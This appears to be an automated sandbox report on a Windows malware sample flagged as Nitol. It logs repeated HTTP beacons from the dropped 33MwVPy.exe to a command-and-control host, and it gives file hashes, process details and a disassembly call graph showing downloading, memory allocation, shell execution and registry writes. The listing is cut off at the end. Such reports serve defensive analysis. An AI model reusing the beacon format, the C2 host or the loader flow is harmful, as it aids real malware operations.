                              Date: Tue, 27 Aug 2024 07:49:34 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HeORMUcaM94b0HTDJ1AifB8rv7uVvKnWWovtlCrufzx3eayYOO742INV8ZiCCOOsAnMiXSl2MgmdOSdblU8YXgwEkGv8fbUD%2Fmgl8QzT8X%2B%2BF9n%2FtSbgoHN1mj2XEhmuQPxNxXk%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a77372ebe5e5f-EWR
                              2024-08-27 07:49:34 UTC32INData Raw: 31 61 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 7d 0d 0a
                              Data Ascii: 1a{"Token":117,"message":""}
                              2024-08-27 07:49:34 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.561388104.26.6.1274433116C:\Program Files (x86)\90m3FHO\33MwVPy.exe
                              TimestampBytes transferredDirectionData
                              2024-08-27 07:49:39 UTC311OUTPOST /api.php/common/gettask HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/json
                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                              MAC: 95sqvgijt7l4529qr975935him
                              Content-Length: 38
                              Host: mvc.withoutyou5.com
                              2024-08-27 07:49:39 UTC38OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 46 67 59 49 43 42 59 63 46 6d 64 63 56 56 56 49 46 67 34 43 54 51 3d 3d
                              Data Ascii: A0TxZkW19VWhYOFgYICBYcFmdcVVVIFg4CTQ==
                              2024-08-27 07:49:40 UTC536INHTTP/1.1 200 OK
                              Date: Tue, 27 Aug 2024 07:49:40 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tKBDwtPGNS12qRgttJVc2f1Ao7NICKtmiyJ2jjYammCRB6bVkCTBtjh9uRqCLPYGoONZaMtsKH1la21vBpLBF%2BlYqIgPKF8d4lXEK1jfTvWZ5KaOpeUFapXQaTB5GEq2RnMLhEQ%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a775d8dfe1978-EWR
                              2024-08-27 07:49:40 UTC32INData Raw: 31 61 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 7d 0d 0a
                              Data Ascii: 1a{"Token":117,"message":""}
                              2024-08-27 07:49:40 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.561389104.26.6.1274433116C:\Program Files (x86)\90m3FHO\33MwVPy.exe
                              TimestampBytes transferredDirectionData
                              2024-08-27 07:49:48 UTC311OUTPOST /api.php/common/gettask HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/json
                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                              MAC: 95sqvgijt7l4529qr975935him
                              Content-Length: 38
                              Host: mvc.withoutyou5.com
                              2024-08-27 07:49:48 UTC38OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 46 67 59 49 43 42 59 63 46 6d 64 63 56 56 56 49 46 67 34 43 54 51 3d 3d
                              Data Ascii: A0TxZkW19VWhYOFgYICBYcFmdcVVVIFg4CTQ==
                              2024-08-27 07:49:49 UTC546INHTTP/1.1 200 OK
                              Date: Tue, 27 Aug 2024 07:49:48 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zr4gkG%2BIugRmv1JaU76CmxwnvlINuijvyQCSue90qWFbcHzh9PcLA9%2FmDek2jttKFhXc10a6k3sU78G0jbF2%2FUZYOcsF1%2BExJgvspzcum2phkHG07wnO0%2BOCRBF%2FrlraRpPteac%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a7791895642b2-EWR
                              2024-08-27 07:49:49 UTC32INData Raw: 31 61 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 7d 0d 0a
                              Data Ascii: 1a{"Token":117,"message":""}
                              2024-08-27 07:49:49 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.561390104.26.6.1274433116C:\Program Files (x86)\90m3FHO\33MwVPy.exe
                              TimestampBytes transferredDirectionData
                              2024-08-27 07:49:56 UTC311OUTPOST /api.php/common/gettask HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/json
                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                              MAC: 95sqvgijt7l4529qr975935him
                              Content-Length: 38
                              Host: mvc.withoutyou5.com
                              2024-08-27 07:49:56 UTC38OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 46 67 59 49 43 42 59 63 46 6d 64 63 56 56 56 49 46 67 34 43 54 51 3d 3d
                              Data Ascii: A0TxZkW19VWhYOFgYICBYcFmdcVVVIFg4CTQ==
                              2024-08-27 07:49:57 UTC542INHTTP/1.1 200 OK
                              Date: Tue, 27 Aug 2024 07:49:57 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xqOz9E37gxNOcuwMN9rfxkrFRZ%2FlBkpXR488X5GC9Yzo4CFLuB3yf08NhSCicWhlRYILtu5YUXfAUvijZAvIx7Ye%2BOciN3T0ho%2FIolqzYNcmlly%2FhBoj7NAJQMutCClR1Rrv9DM%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a77c419348ccc-EWR
                              2024-08-27 07:49:57 UTC32INData Raw: 31 61 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 7d 0d 0a
                              Data Ascii: 1a{"Token":117,"message":""}
                              2024-08-27 07:49:57 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.561391104.26.6.1274433116C:\Program Files (x86)\90m3FHO\33MwVPy.exe
                              TimestampBytes transferredDirectionData
                              2024-08-27 07:50:03 UTC311OUTPOST /api.php/common/gettask HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/json
                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                              MAC: 95sqvgijt7l4529qr975935him
                              Content-Length: 38
                              Host: mvc.withoutyou5.com
                              2024-08-27 07:50:03 UTC38OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 46 67 59 49 43 42 59 63 46 6d 64 63 56 56 56 49 46 67 34 43 54 51 3d 3d
                              Data Ascii: A0TxZkW19VWhYOFgYICBYcFmdcVVVIFg4CTQ==
                              2024-08-27 07:50:04 UTC542INHTTP/1.1 200 OK
                              Date: Tue, 27 Aug 2024 07:50:04 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=29%2B8eX93lp4e87ZktJBG0EIZSNFogVCZ0nPUg9g5kIWY8scBVWqqsjDdVZXeupmf5M3dxmlMAS5Z%2FvwztNd%2Ba7ngEzKvtfPpyJOK2T5YX0G0G6obm%2FyYknuEf9UOSHtyu2LKygY%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a77f21a314303-EWR
                              2024-08-27 07:50:04 UTC32INData Raw: 31 61 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 7d 0d 0a
                              Data Ascii: 1a{"Token":117,"message":""}
                              2024-08-27 07:50:04 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.561392104.26.6.1274433116C:\Program Files (x86)\90m3FHO\33MwVPy.exe
                              TimestampBytes transferredDirectionData
                              2024-08-27 07:50:10 UTC311OUTPOST /api.php/common/gettask HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/json
                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                              MAC: 95sqvgijt7l4529qr975935him
                              Content-Length: 38
                              Host: mvc.withoutyou5.com
                              2024-08-27 07:50:10 UTC38OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 46 67 59 49 43 42 59 63 46 6d 64 63 56 56 56 49 46 67 34 43 54 51 3d 3d
                              Data Ascii: A0TxZkW19VWhYOFgYICBYcFmdcVVVIFg4CTQ==
                              2024-08-27 07:50:11 UTC544INHTTP/1.1 200 OK
                              Date: Tue, 27 Aug 2024 07:50:11 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=deH%2FZZE8YDephYbVynn8D%2F1B%2F7WBit0YLg7DdojF16ta6%2B1mMi4eLhQo4dLsu8c0vlflk1RoR%2B5xP2X4DtQhCkRUMjfbBFV4k49DDwUMqFZugk0LsfVFlmCCJfj5kgjtNmugb1M%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a781ecd588c1e-EWR
                              2024-08-27 07:50:11 UTC32INData Raw: 31 61 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 7d 0d 0a
                              Data Ascii: 1a{"Token":117,"message":""}
                              2024-08-27 07:50:11 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.561393104.26.6.1274433116C:\Program Files (x86)\90m3FHO\33MwVPy.exe
                              TimestampBytes transferredDirectionData
                              2024-08-27 07:50:18 UTC311OUTPOST /api.php/common/gettask HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/json
                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
                              MAC: 95sqvgijt7l4529qr975935him
                              Content-Length: 38
                              Host: mvc.withoutyou5.com
                              2024-08-27 07:50:18 UTC38OUTData Raw: 41 30 54 78 5a 6b 57 31 39 56 57 68 59 4f 46 67 59 49 43 42 59 63 46 6d 64 63 56 56 56 49 46 67 34 43 54 51 3d 3d
                              Data Ascii: A0TxZkW19VWhYOFgYICBYcFmdcVVVIFg4CTQ==
                              2024-08-27 07:50:18 UTC552INHTTP/1.1 200 OK
                              Date: Tue, 27 Aug 2024 07:50:18 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yINt%2Fd%2FnduKjLfd5%2FaXIscAchJZJ9Ma%2FBTP%2BO%2B1g%2FGAwpOyMl0iLeR2smbIkN7OXwxEVjENF0HV3RGd7ywEUSU%2FDbkqx4UA7dXUc2ocQY%2FUsDxeajHRjE8YDfKYcUYDRqFH23DQ%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9a784befac80d9-EWR
                              2024-08-27 07:50:18 UTC32INData Raw: 31 61 0d 0a 7b 22 54 6f 6b 65 6e 22 3a 31 31 37 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 7d 0d 0a
                              Data Ascii: 1a{"Token":117,"message":""}
                              2024-08-27 07:50:18 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:03:47:16
                              Start date:27/08/2024
                              Path:C:\Users\user\Desktop\Rudvfa0Z17.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Rudvfa0Z17.exe"
                              Imagebase:0x400000
                              File size:3'656'704 bytes
                              MD5 hash:BED10AF8B143EE5B48C221BE89786600
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:1
                              Start time:03:47:16
                              Start date:27/08/2024
                              Path:C:\Windows\System32\OpenWith.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                              Imagebase:0x7ff606ad0000
                              File size:123'984 bytes
                              MD5 hash:E4A834784FA08C17D47A1E72429C5109
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:6
                              Start time:03:49:18
                              Start date:27/08/2024
                              Path:C:\Program Files (x86)\90m3FHO\33MwVPy.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\90m3FHO\33MwVPy.exe"
                              Imagebase:0x400000
                              File size:6'453'568 bytes
                              MD5 hash:C8E8EEAF5464AF1A188B3DC12C890813
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000006.00000002.3883625638.0000000010064000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000006.00000002.3883097194.0000000003258000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:7
                              Start time:03:49:27
                              Start date:27/08/2024
                              Path:C:\Program Files (x86)\90m3FHO\33MwVPy.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\90m3FHO\33MwVPy.exe"
                              Imagebase:0x400000
                              File size:6'453'568 bytes
                              MD5 hash:C8E8EEAF5464AF1A188B3DC12C890813
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:8
                              Start time:03:49:36
                              Start date:27/08/2024
                              Path:C:\Program Files (x86)\90m3FHO\33MwVPy.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\90m3FHO\33MwVPy.exe"
                              Imagebase:0x400000
                              File size:6'453'568 bytes
                              MD5 hash:C8E8EEAF5464AF1A188B3DC12C890813
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:4.8%
                                Dynamic/Decrypted Code Coverage:84.3%
                                Signature Coverage:21.3%
                                Total number of Nodes:1091
                                Total number of Limit Nodes:24
                                execution_graph 41525 40de00 FindResourceW 41526 40de22 41525->41526 41527 40de26 41525->41527 41530 40dd90 LoadResource LockResource SizeofResource 41527->41530 41529 40de2e 41530->41529 41531 40eb30 SetUnhandledExceptionFilter 41532 40eb79 41531->41532 41534 40eb96 41531->41534 41564 406620 69 API calls 41532->41564 41537 40ec70 41534->41537 41559 54456a 41534->41559 41535 40eb8c 41565 639c94 72 API calls std::locale::_Locimp::_Locimp_Addfac 41535->41565 41541 40ebda InitCommonControlsEx 41567 543a2c 103 API calls 2 library calls 41541->41567 41543 40ebfc 41568 544e31 98 API calls 41543->41568 41545 40ec03 GdiplusStartup 41546 40ec3d 41545->41546 41547 40ec24 41545->41547 41549 40ec72 41546->41549 41550 40ec4d 41546->41550 41569 406620 69 API calls 41547->41569 41573 5373cc 65 API calls _malloc 41549->41573 41571 5373cc 65 API calls _malloc 41550->41571 41551 40ec33 41570 639c94 72 API calls std::locale::_Locimp::_Locimp_Addfac 41551->41570 41554 40ec7c 41554->41537 41574 4103a0 108 API calls 4 library calls 41554->41574 41556 40ec57 41556->41537 41572 420a60 112 API calls 41556->41572 41575 54dc5b 41559->41575 41561 40ebb4 GetClassInfoW 41566 541f30 108 API calls 2 library calls 41561->41566 41562 544579 41562->41561 41586 54d782 8 API calls 2 library calls 41562->41586 41564->41535 41565->41534 41566->41541 41567->41543 41568->41545 41569->41551 41570->41546 41571->41556 41572->41537 41573->41554 41574->41537 41578 54dc67 __EH_prolog3 41575->41578 41577 54dcb5 41607 54d716 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 41577->41607 41578->41577 41587 54d98c TlsAlloc 41578->41587 41591 54d874 EnterCriticalSection 41578->41591 41606 5381c8 LocalAlloc RaiseException __EH_prolog3 moneypunct __CxxThrowException@8 41578->41606 41582 54dcc2 41583 54dcc8 41582->41583 41584 54dcdb moneypunct 41582->41584 41608 54da33 76 API calls 3 library calls 41583->41608 41584->41562 41586->41562 41588 54d9bd InitializeCriticalSection 41587->41588 41589 54d9b8 41587->41589 41588->41578 41609 538190 LocalAlloc RaiseException __EH_prolog3 moneypunct __CxxThrowException@8 41589->41609 41598 54d897 41591->41598 41592 54d956 _memset 41595 54d96d LeaveCriticalSection 41592->41595 41593 54d8e5 GlobalHandle GlobalUnlock 41597 53751a 69 API calls 41593->41597 41594 54d8d0 41610 53751a 41594->41610 41595->41578 41600 54d903 GlobalReAlloc 41597->41600 41598->41592 41598->41593 41598->41594 41601 54d90f 41600->41601 41602 54d936 GlobalLock 41601->41602 41603 54d928 LeaveCriticalSection 41601->41603 41604 54d91a GlobalHandle GlobalLock 41601->41604 41602->41592 41614 538190 LocalAlloc RaiseException __EH_prolog3 moneypunct __CxxThrowException@8 41603->41614 41604->41603 41606->41578 41607->41582 41608->41584 41609->41588 41611 53752f 41610->41611 41612 53753c GlobalAlloc 41611->41612 41615 40e4a0 69 API calls 41611->41615 41612->41601 41614->41602 41615->41612 41616 53a5f7 41617 53a600 41616->41617 41618 53a5fd 41616->41618 41621 53a5cb 41617->41621 41622 53a5d8 41621->41622 41623 53a5ee DeleteObject 41621->41623 41627 53a515 99 API calls 2 library calls 41622->41627 41625 53a5df 41625->41623 41628 551304 66 API calls 41625->41628 41627->41625 41628->41623 41629 63a2d7 41630 63a354 41629->41630 41642 63a2e5 41629->41642 41652 649740 DecodePointer 41630->41652 41632 63a35a 41653 63cd63 65 API calls __getptd_noexit 41632->41653 41635 63a313 RtlAllocateHeap 41635->41642 41645 63a34c 41635->41645 41637 63a340 41650 63cd63 65 API calls __getptd_noexit 41637->41650 41641 63a2f0 41641->41642 41646 645329 65 API calls 2 library calls 41641->41646 41647 64517a 65 API calls 6 library calls 41641->41647 41648 63b587 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 41641->41648 41642->41635 41642->41637 41642->41641 41643 63a33e 41642->41643 41649 649740 DecodePointer 41642->41649 41651 63cd63 65 API calls __getptd_noexit 41643->41651 41646->41641 41647->41641 41649->41642 41650->41643 41651->41645 41652->41632 41653->41645 41654 409b4c 41679 40e1b0 41654->41679 41659 40e080 102 API calls 41660 409b89 41659->41660 41661 40e080 102 API calls 41660->41661 41662 409b9d 41661->41662 41696 406f50 103 API calls ___crtMessageBoxW 41662->41696 41664 409ba8 41697 40dbb0 69 API calls 41664->41697 41666 409bb8 41672 409ca5 41666->41672 41698 427ff0 41666->41698 41670 409c00 41716 40dc20 69 API calls 2 library calls 41670->41716 41674 409c53 41672->41674 41673 409c1c CreateFileW 41673->41674 41675 409c3a CloseHandle 41673->41675 41674->41672 41718 6388f0 5 API calls __call_reportfault 41674->41718 41717 40dd20 69 API calls _memcpy_s 41675->41717 41678 409dbd 41680 40e1cb 41679->41680 41681 40e1e4 41680->41681 41719 40e240 69 API calls 41680->41719 41720 63a6f1 65 API calls 3 library calls 41681->41720 41684 409b66 41685 40e080 41684->41685 41686 40e0af 41685->41686 41687 40e0c4 41686->41687 41731 40e4a0 69 API calls 41686->41731 41689 40e0e8 41687->41689 41690 40e100 41687->41690 41732 5382f3 98 API calls 41689->41732 41690->41690 41721 40e360 41690->41721 41693 409b75 41693->41659 41694 40e0f1 41694->41693 41733 40ded0 73 API calls _wmemcpy_s 41694->41733 41696->41664 41697->41666 41699 428049 _memset 41698->41699 41701 428066 41699->41701 41761 40e4a0 69 API calls 41699->41761 41702 42809c GetModuleFileNameW 41701->41702 41762 40e4a0 69 API calls 41701->41762 41705 4280d0 41702->41705 41705->41705 41706 40e360 69 API calls 41705->41706 41707 4280f2 _wcsrchr 41706->41707 41746 419560 41707->41746 41711 428130 41764 6388f0 5 API calls __call_reportfault 41711->41764 41714 409bf0 41715 40dd20 69 API calls _memcpy_s 41714->41715 41715->41670 41716->41673 41717->41674 41718->41678 41719->41681 41720->41684 41722 40e372 41721->41722 41726 40e37f 41721->41726 41742 40e140 69 API calls 41722->41742 41724 40e377 41724->41693 41725 40e4a0 69 API calls 41725->41726 41726->41725 41730 40e3fa 41726->41730 41734 40e290 41726->41734 41743 63acd4 65 API calls 2 library calls 41726->41743 41744 63a6f1 65 API calls 3 library calls 41726->41744 41730->41693 41731->41687 41732->41694 41733->41693 41735 40e2a0 41734->41735 41736 40e2a8 41735->41736 41740 40e2b3 41735->41740 41737 40e1b0 69 API calls 41736->41737 41739 40e2ae 41737->41739 41738 40e2e0 41738->41726 41739->41726 41740->41738 41745 40e250 69 API calls 41740->41745 41742->41724 41743->41726 41744->41726 41745->41738 41748 419642 41746->41748 41747 419825 ShellExecuteA 41749 41984e 41747->41749 41748->41747 41750 419867 CreateThread 41749->41750 41752 4198a0 41750->41752 41751 419ca8 41763 40dbb0 69 API calls 41751->41763 41752->41751 41753 4199bf VirtualAlloc 41752->41753 41754 4199f2 41753->41754 41755 419b7e VirtualAlloc 41754->41755 41756 419bb6 InternetOpenA InternetOpenUrlA 41755->41756 41757 419bff 41756->41757 41757->41756 41758 419c16 InternetReadFile 41757->41758 41759 419c53 41757->41759 41758->41757 41760 419c7c CreateThread 41759->41760 41760->41751 41765 26d0000 41760->41765 41761->41701 41762->41702 41763->41711 41764->41714 41767 26d0005 41765->41767 41770 26d0031 41767->41770 41782 26d0b11 GetPEB 41770->41782 41773 26d0b11 GetPEB 41775 26d02a6 41773->41775 41774 26d002c 41775->41774 41776 26d049a GetNativeSystemInfo 41775->41776 41776->41774 41777 26d04c7 VirtualAlloc 41776->41777 41778 26d04e0 41777->41778 41784 1000c504 41778->41784 41783 26d029a 41782->41783 41783->41773 41785 1000c514 41784->41785 41786 1000c50f 41784->41786 41897 1000c40e 41785->41897 41905 100108ac GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 41786->41905 41789 26d0a47 41789->41774 41790 100039a3 41789->41790 41791 100039c2 _memset __write_nolock 41790->41791 41792 10003b5b Sleep 41791->41792 41793 10003c9a _memset 41792->41793 41794 10003cb4 Sleep 41793->41794 41795 10003deb _memset 41794->41795 41988 1000b9db GetSystemTimeAsFileTime 41795->41988 41797 10003e0b 41990 1000b8ac 41797->41990 41799 10003e12 _memset 41993 1000b8be 41799->41993 41801 10003e36 41802 10003e72 _memset 41801->41802 41803 1000b8be _rand 38 API calls 41801->41803 41804 10003ece wsprintfA 41802->41804 41803->41801 41805 10003f0a _memset 41804->41805 41806 10003f34 Sleep 41805->41806 41996 1000cce0 41806->41996 41808 10003f4e wsprintfA 41809 10003f73 _memset 41808->41809 41810 10003fba wsprintfA 41809->41810 41811 10003ffb _memset 41810->41811 41812 10004013 Sleep 41811->41812 41813 1000cce0 _memset 41812->41813 41814 1000404c wsprintfA 41813->41814 41815 10004084 _memset 41814->41815 41816 1000409c Sleep 41815->41816 41817 1000cce0 _memset 41816->41817 41818 100040d0 wsprintfA 41817->41818 41819 10004108 _memset 41818->41819 41998 100028b9 41819->41998 41822 10004178 41823 100028b9 49 API calls 41822->41823 41824 100041a0 Sleep 41823->41824 41824->41822 41825 100041b5 41824->41825 41826 100028b9 49 API calls 41825->41826 41827 100041dd Sleep 41826->41827 41827->41825 41828 100041f2 41827->41828 41829 1000b9db __time64 GetSystemTimeAsFileTime 41828->41829 41830 100041f8 41829->41830 41831 1000b8ac 38 API calls 41830->41831 41832 100041ff _memset 41831->41832 41833 1000b8be _rand 38 API calls 41832->41833 41834 10004239 _memset 41832->41834 41833->41832 42008 100059cb 41834->42008 41836 100042f9 42015 100059a5 41836->42015 41839 100059cb 45 API calls 41840 1000432e 41839->41840 41841 100059cb 45 API calls 41840->41841 41842 10004349 41841->41842 41843 100059cb 45 API calls 41842->41843 41844 10004369 41843->41844 41845 100059cb 45 API calls 41844->41845 41846 10004389 41845->41846 42018 1000a063 41846->42018 41848 1000439d 42050 10002e6f CreateFileA GetFileSize 41848->42050 41850 100043ba Sleep Sleep 41851 100043ee _memset 41850->41851 42058 1000afbd 41851->42058 41853 1000440b _memset 42062 1000b91d 41853->42062 41856 1000448d 42071 100018ea 41856->42071 41859 10004497 42253 10002388 64 API calls 3 library calls 41859->42253 41861 10004699 GlobalAddAtomA 41868 100046c0 41861->41868 41862 100044a4 Sleep 41862->41861 41863 100044b6 41863->41861 42254 1000356a 7 API calls 41863->42254 41865 10004630 41866 10004641 Sleep 41865->41866 41867 1000465b 41865->41867 42255 1000356a 7 API calls 41866->42255 42256 100036ed CLRCreateInstance SafeArrayAccessData SafeArrayUnaccessData SysAllocString __EH_prolog3 41867->42256 41872 10004c13 Sleep 41868->41872 41870 10004658 41870->41867 42232 100031c7 41872->42232 41873 10004685 41873->41861 42257 10001144 76 API calls 4 library calls 41873->42257 41877 10004698 41877->41861 41878 10004c2d 42250 1000bcaf 41878->42250 41880 10004c33 RegOpenKeyExA 41886 10004b3b _memset 41880->41886 41881 10004c97 Sleep 41881->41886 41882 10004c63 RegSetValueExA RegCloseKey 41882->41886 41884 10004b6b LoadLibraryA 41884->41886 41885 10004bbc GetProcAddress 41885->41872 41885->41886 41886->41881 41886->41882 41886->41884 41886->41885 41887 10004bf9 ShellExecuteA 41886->41887 42259 10002388 64 API calls 3 library calls 41886->42259 41887->41872 41888 10004705 _memset 41889 1000afbd _mbstowcs 42 API calls 41888->41889 41890 100049a9 _memset 41889->41890 41891 1000b91d _strcat_s 38 API calls 41890->41891 41892 10004aa8 FindWindowExA 41891->41892 41892->41880 41893 10004ac5 41892->41893 42258 10001030 8 API calls 2 library calls 41893->42258 41895 10004ae0 Sleep 41896 10004af7 41895->41896 41896->41886 41898 1000c41a __freefls@4 41897->41898 41902 1000c4b7 __freefls@4 41898->41902 41903 1000c467 ___DllMainCRTStartup 41898->41903 41906 1000c2aa 41898->41906 41900 1000c497 41901 1000c2aa __CRT_INIT@12 83 API calls 41900->41901 41900->41902 41901->41902 41902->41789 41903->41900 41903->41902 41904 1000c2aa __CRT_INIT@12 83 API calls 41903->41904 41904->41900 41905->41785 41907 1000c2b6 __freefls@4 41906->41907 41908 1000c338 41907->41908 41909 1000c2be 41907->41909 41911 1000c399 41908->41911 41912 1000c33e 41908->41912 41958 1000ef88 HeapCreate 41909->41958 41913 1000c3f7 41911->41913 41914 1000c39e 41911->41914 41918 1000c35c 41912->41918 41925 1000c2c7 __freefls@4 41912->41925 41968 1000bcdb 38 API calls _doexit 41912->41968 41913->41925 41984 1000eb52 41 API calls __freefls@4 41913->41984 41973 1000e86b TlsGetValue 41914->41973 41915 1000c2c3 41917 1000c2ce 41915->41917 41915->41925 41959 1000ebc0 45 API calls 5 library calls 41917->41959 41923 1000c370 41918->41923 41969 10010327 39 API calls _free 41918->41969 41972 1000c383 40 API calls __mtterm 41923->41972 41925->41903 41927 1000c2d3 __RTC_Initialize 41930 1000c2d7 41927->41930 41935 1000c2e3 GetCommandLineA 41927->41935 41929 1000c3af 41929->41925 41932 